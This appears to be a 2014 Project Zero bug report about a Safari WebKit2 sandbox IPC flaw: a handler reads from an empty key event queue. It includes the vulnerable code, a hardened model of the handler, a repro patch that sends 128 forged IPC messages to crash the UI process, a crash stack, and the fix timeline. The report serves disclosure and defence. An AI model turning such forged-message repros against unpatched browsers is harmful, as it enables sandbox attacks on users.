Safari sandbox IPC memory corruption with WebEvent::Char
Reported by ianbeer@google.com (Project Member), Apr 3 2014
The handler for the WebPageProxy::DidReceiveEvent IPC message fails to check that the WTF::Deque m_keyEventQueue is not empty before calling first() when processing an event of type WebEvent::Char:
void WebPageProxy::didReceiveEvent(uint32_t opaqueType, bool handled)
...
    case WebEvent::Char: {
        LOG(KeyHandling, "WebPageProxy::didReceiveEvent: %s", webKeyboardEventTypeString(type));
        NativeWebKeyboardEvent event = m_keyEventQueue.first();
        MESSAGE_CHECK(type == event.type());
        m_keyEventQueue.removeFirst();
        if (!m_keyEventQueue.isEmpty())
            m_process->send(Messages::WebPage::KeyEvent(m_keyEventQueue.first()), m_pageID);
        m_pageClient.doneWithKeyEvent(event, handled);
        if (handled)
            break;
        if (m_uiClient->implementsDidNotHandleKeyEvent())
            m_uiClient->didNotHandleKeyEvent(this, event);
        break;
...
Not sure about the security implications. I haven't looked into this one very much, but the NativeWebKeyboardEvent does contain some interesting pointers on some platforms.
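The following is an added, self-contained model of the Char case above (not WebKit code and not Apple's eventual fix), showing the hardened handler beside what the original assumes: the class name, the EventType/Outcome enums and the KeyEvent struct are hypothetical, and Char = 7 is taken from opaqueType=7 in the crash stack.

```cpp
#include <cstddef>
#include <cstdint>
#include <deque>
#include <string>

// Hypothetical stand-in for WebEvent::Type; Char = 7 matches the opaqueType
// in frame #3 of the crash stack, the other value is constructed.
enum class EventType : uint32_t { Wheel = 3, Char = 7 };
struct KeyEvent { EventType type; std::string text; };

// WebKit's MESSAGE_CHECK kills the sending web process; this model returns
// the same decision instead so it can be exercised offline.
enum class Outcome { Handled, NotHandled, RejectedEmptyQueue, RejectedTypeMismatch };

class KeyEventQueueProxy {
public:
    // UI-process side: a key event is queued when forwarded to the web process.
    void sendKeyEvent(KeyEvent e) { m_keyEventQueue.push_back(e); }

    // Hardened equivalent of the WebEvent::Char case in didReceiveEvent.
    Outcome didReceiveEvent(uint32_t opaqueType, bool handled) {
        EventType type = static_cast<EventType>(opaqueType);
        // The check the original lacks: a completion is only valid if the
        // UI process actually has a key event outstanding.
        if (m_keyEventQueue.empty())
            return Outcome::RejectedEmptyQueue;
        KeyEvent event = m_keyEventQueue.front();  // safe: non-empty
        if (type != event.type)
            return Outcome::RejectedTypeMismatch;  // the existing MESSAGE_CHECK
        m_keyEventQueue.pop_front();
        return handled ? Outcome::Handled : Outcome::NotHandled;
    }
    std::size_t pending() const { return m_keyEventQueue.size(); }
private:
    std::deque<KeyEvent> m_keyEventQueue;
};

// Replays the repro patch: 128 unsolicited Char completions, nothing queued.
int countRejectedReplays() {
    KeyEventQueueProxy proxy;
    int rejected = 0;
    for (int i = 0; i < 128; i++)
        if (proxy.didReceiveEvent(7, false) == Outcome::RejectedEmptyQueue)
            rejected++;
    return rejected;
}
// Legitimate round trip: one queued Char event, then its completion.
Outcome legitimateRoundTrip() {
    KeyEventQueueProxy proxy;
    proxy.sendKeyEvent({EventType::Char, "a"});
    return proxy.didReceiveEvent(7, true);
}
```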
Repro patch, apply and scroll a webpage:
Source/WebKit2/WebProcess/WebPage/EventDispatcher.cpp:
ScrollingTree::EventResult result = scrollingTree->tryToHandleWheelEvent(platformWheelEvent);
if (result == ScrollingTree::DidHandleEvent || result == ScrollingTree::DidNotHandleEvent) {
- sendDidReceiveEvent(pageID, wheelEvent, result == ScrollingTree::DidHandleEvent);
+ for (int i = 0; i < 128; i++){
+ WebProcess::shared().parentProcessConnection()->send(Messages::WebPageProxy::DidReceiveEvent(static_cast<uint32_t>(7), false), pageID);
+ }
return;
}
}
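Review bot: the added loop sends 128 DidReceiveEvent messages with opaqueType 7 (the WebEvent::Char case, matching opaqueType=7 in frame #3 of the stack) although the UI process never queued a key event, so the receiver reaches m_keyEventQueue.first() on an empty Deque; that is the point of the repro, and the fix belongs on the receiving side as a MESSAGE_CHECK(!m_keyEventQueue.isEmpty()) ahead of first(). Two smaller points: `static_cast<uint32_t>(7)` would read better as `static_cast<uint32_t>(WebEvent::Char)`, and the original `sendDidReceiveEvent(pageID, wheelEvent, ...)` is dropped rather than kept, so the wheel event is never acknowledged while this patch is applied.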
Crash Stack (null pointer dereference)
(lldb) bt
* thread #1: tid = 0x15bcc, 0x000000010b0b4f00 WebKit2`WebKit::WebPageProxy::didReceiveEvent(unsigned int, bool) [inlined] WebKit::WebKeyboardEvent::WebKeyboardEvent(WebKit::WebKeyboardEvent const&) at WebEvent.h:214, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
frame #0: 0x000000010b0b4f00 WebKit2`WebKit::WebPageProxy::didReceiveEvent(unsigned int, bool) [inlined] WebKit::WebKeyboardEvent::WebKeyboardEvent(WebKit::WebKeyboardEvent const&) at WebEvent.h:214
frame #1: 0x000000010b0b4f00 WebKit2`WebKit::WebPageProxy::didReceiveEvent(unsigned int, bool) [inlined] WebKit::NativeWebKeyboardEvent::NativeWebKeyboardEvent(this=0x00007fff55691e3c) at NativeWebKeyboardEvent.h:60
frame #2: 0x000000010b0b4f00 WebKit2`WebKit::WebPageProxy::didReceiveEvent(unsigned int, bool) [inlined] WTF::Deque<WebKit::NativeWebKeyboardEvent>::first(this=0x00007fff55691e3c) + 20 at NativeWebKeyboardEvent.h:60
frame #3: 0x000000010b0b4eec WebKit2`WebKit::WebPageProxy::didReceiveEvent(this=0x00007fa3a1824818, opaqueType=7, handled=false) + 92 at WebPageProxy.cpp:3707
frame #4: 0x000000010b0d3648 WebKit2`void IPC::handleMessage<Messages::WebPageProxy::DidReceiveEvent, WebKit::WebPageProxy, void (WebKit::WebPageProxy::*)(unsigned int, bool)>(IPC::MessageDecoder&, WebKit::WebPageProxy*, void (WebKit::WebPageProxy::*)(unsigned int, bool)) [inlined] void IPC::callMemberFunctionImpl<WebKit::WebPageProxy, void (args=0x0000000000000007, __t=0x0000000000000007, object=<unavailable>)(unsigned int, bool), std::__1::tuple<unsigned int, bool>, 0ul, 1ul>(WebKit::WebPageProxy*, void (WebKit::WebPageProxy::*)(unsigned int, bool), std::__1::tuple<unsigned int, bool>&&, std::index_sequence<0ul, 1ul>) + 73 at HandleMessage.h:16
frame #5: 0x000000010b0d362a WebKit2`void IPC::handleMessage<Messages::WebPageProxy::DidReceiveEvent, WebKit::WebPageProxy, void (WebKit::WebPageProxy::*)(unsigned int, bool)>(IPC::MessageDecoder&, WebKit::WebPageProxy*, void (WebKit::WebPageProxy::*)(unsigned int, bool)) [inlined] void IPC::callMemberFunction<WebKit::WebPageProxy, void (args=0x0000000000000007, __t=0x0000000000000007)(unsigned int, bool), std::__1::tuple<unsigned int, bool>, std::make_index_sequence<2ul> >(std::__1::tuple<unsigned int, bool>&&, WebKit::WebPageProxy*, void (WebKit::WebPageProxy::*)(unsigned int, bool)) at HandleMessage.h:22
frame #6: 0x000000010b0d362a WebKit2`void IPC::handleMessage<Messages::WebPageProxy::DidReceiveEvent, WebKit::WebPageProxy, void (decoder=<unavailable>, object=<unavailable>, function=<unavailable>)(unsigned int, bool)>(IPC::MessageDecoder&, WebKit::WebPageProxy*, void (WebKit::WebPageProxy::*)(unsigned int, bool)) + 43 at HandleMessage.h:117
frame #7: 0x000000010b0d0c8e WebKit2`WebKit::WebPageProxy::didReceiveMessage(this=0x00007fa3a1824818, connection=<unavailable>, decoder=0x00000001139b4958) + 916 at WebPageProxyMessageReceiver.cpp:214
frame #8: 0x000000010afb77d5 WebKit2`IPC::MessageReceiverMap::dispatchMessage(this=<unavailable>, connection=0x0000000110707780, decoder=0x00000001139b4958) + 125 at MessageReceiverMap.cpp:87
frame #9: 0x000000010af64947 WebKit2`WebKit::ChildProcessProxy::dispatchMessage(this=<unavailable>, connection=<unavailable>, decoder=<unavailable>) + 13 at ChildProcessProxy.cpp:118
frame #10: 0x000000010b0fd328 WebKit2`WebKit::WebProcessProxy::didReceiveMessage(this=0x000000010ee18a80, connection=0x0000000110707780, decoder=0x00000001139b4958) + 24 at WebProcessProxy.cpp:364
frame #11: 0x000000010af65afc WebKit2`IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::MessageDecoder, std::__1::default_delete<IPC::MessageDecoder> >) [inlined] IPC::Connection::dispatchMessage(decoder=<unavailable>, this=<unavailable>) + 94 at Connection.cpp:770
frame #12: 0x000000010af65aef WebKit2`IPC::Connection::dispatchMessage(this=0x0000000110707780, message=0x00007fff55692020) + 81 at Connection.cpp:791
frame #13: 0x000000010af67b70 WebKit2`IPC::Connection::dispatchOneMessage(this=0x0000000110707780) + 106 at Connection.cpp:817
frame #14: 0x000000010a95aa45 JavaScriptCore`WTF::RunLoop::performWork() [inlined] std::__1::function<void (this=0x00007fff556920e0)>::operator()() const + 421 at functional:1435
frame #15: 0x000000010a95aa3b JavaScriptCore`WTF::RunLoop::performWork(this=0x000000010ee07f30) + 411 at RunLoop.cpp:104
frame #16: 0x000000010a95b122 JavaScriptCore`WTF::RunLoop::performWork(context=<unavailable>) + 34 at RunLoopCF.cpp:38
frame #17: 0x00007fff871bb731 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
frame #18: 0x00007fff871acea2 CoreFoundation`__CFRunLoopDoSources0 + 242
frame #19: 0x00007fff871ac62f CoreFoundation`__CFRunLoopRun + 831
frame #20: 0x00007fff871ac0b5 CoreFoundation`CFRunLoopRunSpecific + 309
frame #21: 0x00007fff90fb1a0d HIToolbox`RunCurrentEventLoopInMode + 226
frame #22: 0x00007fff90fb17b7 HIToolbox`ReceiveNextEventCommon + 479
frame #23: 0x00007fff90fb15bc HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 65
frame #24: 0x00007fff8db9e3de AppKit`_DPSNextEvent + 1434
frame #25: 0x00007fff8db9da2b AppKit`-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 122
frame #26: 0x00007fff8a241290 Safari`-[BrowserApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 161
frame #27: 0x00007fff8db91b2c AppKit`-[NSApplication run] + 553
frame #28: 0x00007fff8db7c913 AppKit`NSApplicationMain + 940
frame #29: 0x00007fff8a41306d Safari`SafariMain + 267
frame #30: 0x00007fff83a405fd libdyld.dylib`start + 1
frame #31: 0x00007fff83a405fd libdyld.dylib`start + 1
Comment 1 by ianbeer@google.com (Project Member), Apr 3 2014
Apr 4 2014
Apr 4 2014: Apple follow up id: 605055598
Apr 4 2014
May 22 2014: Fixed in Safari 7.0.4
Jul 31 2014